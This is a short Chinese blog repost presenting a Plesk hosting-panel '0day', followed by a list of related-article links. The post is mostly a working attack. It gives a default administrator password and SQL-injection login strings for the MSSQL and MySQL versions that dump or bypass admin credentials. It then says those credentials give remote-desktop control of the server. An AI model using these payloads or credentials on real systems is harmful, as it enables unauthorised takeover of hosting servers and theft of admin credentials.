plesk panel 虚拟主机管理平台 0day

简介:

 1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin   密码stepu

 

2,在https://xxxxx.com:8443

mssql版本

账号 ' union select top 1 login+char(124)+passwd from admin_aliases--

报错,爆出账号密码

登陆后server-->remote desktop账号密码一样
拿到服务器权限

mysql版本
'union select '-1 union select 1,1,1#'#   密码填 1















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/496153,如需转载请自行联系原作者

相关文章
|
NoSQL 安全 MongoDB
MongoDB 未授权访问漏洞利用
MongoDB 未授权访问漏洞利用
1744 0
|
Linux KVM 虚拟化
云计算——虚拟化层架构
云计算——虚拟化层架构
482 0
|
安全 Android开发
夜神模拟器 安卓7.0 burp抓包 https流量
夜神模拟器 安卓7.0 burp抓包 https流量
784 0
|
弹性计算 安全 API
利用SSRF漏洞滥用AWS元数据服务
本文讲的是利用SSRF漏洞滥用AWS元数据服务,我最近在一个小型玩具项目上工作,是在Docker容器中执行不信任的Python代码。我测试了几个在线的代码执行引擎,想看看它们对各种攻击的反应。
2580 0
|
9月前
|
Java
kali安装专业版burpsuite
kali安装专业版burpsuite
kali安装专业版burpsuite
|
9月前
|
数据可视化
Tensorboard可视化学习笔记(一):如何可视化通过网页查看log日志
关于如何使用TensorBoard进行数据可视化的教程,包括TensorBoard的安装、配置环境变量、将数据写入TensorBoard、启动TensorBoard以及如何通过网页查看日志文件。
901 0
|
Linux
Linux设置系统时间(上海时区、硬件时间、重启有效)
Linux设置系统时间(上海时区、硬件时间、重启有效)
869 0
|
安全 算法 数据安全/隐私保护
CSRF 实验:Token 不与 Session 绑定绕过验证
CSRF 实验:Token 不与 Session 绑定绕过验证
|
Linux Shell 开发工具
linux 搭建git仓库 git代码仓库 (小团队内部合作)
linux 搭建git仓库 git代码仓库 (小团队内部合作)
610 1
|
JavaScript iOS开发 MacOS
掌握NVM、NRM和NPM:Node.js开发的利器
掌握NVM、NRM和NPM:Node.js开发的利器
296 0